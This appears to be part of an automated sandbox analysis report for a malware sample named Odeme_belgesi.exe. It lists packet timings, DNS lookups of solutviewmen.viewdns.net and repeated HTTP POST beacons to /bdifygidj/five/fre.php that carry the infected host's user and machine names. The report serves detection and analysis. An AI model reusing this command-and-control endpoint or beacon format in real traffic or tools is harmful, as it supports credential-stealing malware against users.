Oct 1, 2024 10:56:50.153801918 CEST	49831	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:50.153883934 CEST	49831	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:50.158653975 CEST	80	49831	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:50.303663969 CEST	49832	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:50.308577061 CEST	80	49832	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:50.308671951 CEST	49832	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:50.310678005 CEST	49832	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:50.315412998 CEST	80	49832	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:50.315483093 CEST	49832	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:50.320280075 CEST	80	49832	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:50.984432936 CEST	80	49832	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:50.984467983 CEST	80	49832	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:50.984560966 CEST	49832	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:50.984560966 CEST	49832	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:50.989481926 CEST	80	49832	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:51.127923965 CEST	49833	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:51.132833958 CEST	80	49833	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:51.132921934 CEST	49833	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:51.134881973 CEST	49833	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:51.139684916 CEST	80	49833	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:51.139744043 CEST	49833	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:51.144855976 CEST	80	49833	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:51.880937099 CEST	80	49833	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:51.881052017 CEST	49833	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:51.881073952 CEST	80	49833	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:51.881123066 CEST	49833	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:51.885895967 CEST	80	49833	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:52.018949032 CEST	49834	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:52.023880005 CEST	80	49834	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:52.023979902 CEST	49834	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:52.026005983 CEST	49834	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:52.030776978 CEST	80	49834	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:52.030834913 CEST	49834	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:52.035727024 CEST	80	49834	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:52.776621103 CEST	80	49834	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:52.776638031 CEST	80	49834	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:52.776756048 CEST	49834	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:52.784621000 CEST	49834	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:52.789437056 CEST	80	49834	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:52.920841932 CEST	49835	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:52.925955057 CEST	80	49835	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:52.926045895 CEST	49835	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:52.928201914 CEST	49835	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:52.933007956 CEST	80	49835	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:52.933069944 CEST	49835	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:52.937911034 CEST	80	49835	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:53.772931099 CEST	80	49835	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:53.773027897 CEST	80	49835	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:53.773057938 CEST	49835	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:53.773080111 CEST	49835	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:53.777993917 CEST	80	49835	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:53.926585913 CEST	49836	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:53.931476116 CEST	80	49836	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:53.931587934 CEST	49836	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:53.934497118 CEST	49836	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:53.939332008 CEST	80	49836	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:53.939405918 CEST	49836	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:53.944281101 CEST	80	49836	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:54.594682932 CEST	80	49836	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:54.594753027 CEST	80	49836	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:54.594825029 CEST	49836	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:54.595424891 CEST	49836	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:54.603049994 CEST	80	49836	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:54.737349033 CEST	49837	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:54.743048906 CEST	80	49837	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:54.743160963 CEST	49837	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:54.745157957 CEST	49837	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:54.751154900 CEST	80	49837	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:54.751235008 CEST	49837	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:54.756027937 CEST	80	49837	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:55.409951925 CEST	80	49837	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:55.409990072 CEST	80	49837	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:55.410094976 CEST	49837	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:55.410146952 CEST	49837	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:55.414906025 CEST	80	49837	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:55.549855947 CEST	49838	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:55.554817915 CEST	80	49838	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:55.554932117 CEST	49838	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:55.557056904 CEST	49838	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:55.561853886 CEST	80	49838	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:55.562072992 CEST	49838	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:55.566962957 CEST	80	49838	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:56.206754923 CEST	80	49838	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:56.206787109 CEST	80	49838	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:56.206844091 CEST	49838	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:56.207001925 CEST	49838	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:56.211771011 CEST	80	49838	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:56.341849089 CEST	49839	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:56.346730947 CEST	80	49839	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:56.346828938 CEST	49839	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:56.348913908 CEST	49839	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:56.353913069 CEST	80	49839	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:56.353976965 CEST	49839	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:56.358797073 CEST	80	49839	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:57.140919924 CEST	80	49839	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:57.140942097 CEST	80	49839	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:57.140958071 CEST	80	49839	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:57.141031981 CEST	49839	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:57.141153097 CEST	49839	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:57.141153097 CEST	49839	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:57.145919085 CEST	80	49839	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:57.284576893 CEST	49840	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:57.289500952 CEST	80	49840	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:57.289592981 CEST	49840	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:57.291670084 CEST	49840	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:57.296540976 CEST	80	49840	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:57.296632051 CEST	49840	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:57.301481962 CEST	80	49840	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:57.970891953 CEST	80	49840	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:57.970988989 CEST	49840	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:57.971039057 CEST	80	49840	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:57.971086025 CEST	49840	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:57.976547956 CEST	80	49840	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:58.109875917 CEST	49841	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:58.115355015 CEST	80	49841	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:58.115446091 CEST	49841	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:58.117475986 CEST	49841	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:58.123116016 CEST	80	49841	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:58.123183012 CEST	49841	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:58.128233910 CEST	80	49841	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:58.803797007 CEST	80	49841	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:58.804022074 CEST	49841	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:58.804541111 CEST	80	49841	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:58.804594994 CEST	49841	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:58.809434891 CEST	80	49841	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:59.225980043 CEST	49842	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:59.231942892 CEST	80	49842	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:59.232115030 CEST	49842	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:59.234206915 CEST	49842	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:59.238960028 CEST	80	49842	45.66.231.242	192.168.2.4
Oct 1, 2024 10:56:59.239027023 CEST	49842	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:56:59.244564056 CEST	80	49842	45.66.231.242	192.168.2.4
Oct 1, 2024 10:57:00.074596882 CEST	80	49842	45.66.231.242	192.168.2.4
Oct 1, 2024 10:57:00.074697018 CEST	80	49842	45.66.231.242	192.168.2.4
Oct 1, 2024 10:57:00.074827909 CEST	49842	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:57:00.075083017 CEST	49842	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:57:00.079904079 CEST	80	49842	45.66.231.242	192.168.2.4
Oct 1, 2024 10:57:00.223882914 CEST	49843	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:57:00.228730917 CEST	80	49843	45.66.231.242	192.168.2.4
Oct 1, 2024 10:57:00.228832006 CEST	49843	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:57:00.230870962 CEST	49843	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:57:00.235863924 CEST	80	49843	45.66.231.242	192.168.2.4
Oct 1, 2024 10:57:00.235929012 CEST	49843	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:57:00.240870953 CEST	80	49843	45.66.231.242	192.168.2.4
Oct 1, 2024 10:57:01.013664961 CEST	80	49843	45.66.231.242	192.168.2.4
Oct 1, 2024 10:57:01.013789892 CEST	80	49843	45.66.231.242	192.168.2.4
Oct 1, 2024 10:57:01.013791084 CEST	49843	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:57:01.013830900 CEST	49843	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:57:01.018611908 CEST	80	49843	45.66.231.242	192.168.2.4
Oct 1, 2024 10:57:01.157294035 CEST	49844	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:57:01.162226915 CEST	80	49844	45.66.231.242	192.168.2.4
Oct 1, 2024 10:57:01.162329912 CEST	49844	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:57:01.164479017 CEST	49844	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:57:01.169265032 CEST	80	49844	45.66.231.242	192.168.2.4
Oct 1, 2024 10:57:01.169312000 CEST	49844	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:57:01.174132109 CEST	80	49844	45.66.231.242	192.168.2.4
Oct 1, 2024 10:57:01.960577011 CEST	80	49844	45.66.231.242	192.168.2.4
Oct 1, 2024 10:57:01.960664034 CEST	80	49844	45.66.231.242	192.168.2.4
Oct 1, 2024 10:57:01.960683107 CEST	49844	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:57:01.960709095 CEST	49844	80	192.168.2.4	45.66.231.242
Oct 1, 2024 10:57:01.965569019 CEST	80	49844	45.66.231.242	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 10:54:58.990483999 CEST	52416	53	192.168.2.4	1.1.1.1
Oct 1, 2024 10:54:59.000077009 CEST	53	52416	1.1.1.1	192.168.2.4
Oct 1, 2024 10:55:58.736445904 CEST	51431	53	192.168.2.4	1.1.1.1
Oct 1, 2024 10:55:58.747952938 CEST	53	51431	1.1.1.1	192.168.2.4
Oct 1, 2024 10:56:59.012109995 CEST	54613	53	192.168.2.4	1.1.1.1
Oct 1, 2024 10:56:59.225207090 CEST	53	54613	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 1, 2024 10:54:58.990483999 CEST	192.168.2.4	1.1.1.1	0xea01	Standard query (0)	solutviewmen.viewdns.net	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:55:58.736445904 CEST	192.168.2.4	1.1.1.1	0xddfc	Standard query (0)	solutviewmen.viewdns.net	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:56:59.012109995 CEST	192.168.2.4	1.1.1.1	0x345e	Standard query (0)	solutviewmen.viewdns.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 1, 2024 10:54:59.000077009 CEST	1.1.1.1	192.168.2.4	0xea01	No error (0)	solutviewmen.viewdns.net	45.66.231.242	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:55:58.747952938 CEST	1.1.1.1	192.168.2.4	0xddfc	No error (0)	solutviewmen.viewdns.net	45.66.231.242	A (IP address)	IN (0x0001)	false
Oct 1, 2024 10:56:59.225207090 CEST	1.1.1.1	192.168.2.4	0x345e	No error (0)	solutviewmen.viewdns.net	45.66.231.242	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

solutviewmen.viewdns.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:54:59.012348890 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 176 Connection: close
Oct 1, 2024 10:54:59.017244101 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones965969JONES-PCk0FDD42EE188E931437F4FBE2CzteoF
Oct 1, 2024 10:54:59.840167046 CEST	169	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:00.007311106 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 176 Connection: close
Oct 1, 2024 10:55:00.012404919 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones965969JONES-PC+0FDD42EE188E931437F4FBE2C9FzzC
Oct 1, 2024 10:55:00.929594994 CEST	169	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:01.007904053 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:01.012877941 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:01.753258944 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:01.924715042 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:01.929584026 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:02.665991068 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:34 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:02.833983898 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:02.838931084 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:03.554172993 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:03.730034113 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:03.734896898 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:04.620654106 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:04.786977053 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:04.791908979 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:05.540540934 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:05.709995985 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:05.714855909 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:06.533355951 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49738	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:06.685117960 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:06.689995050 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:10.377545118 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:25:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49739	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:10.534509897 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:10.539446115 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
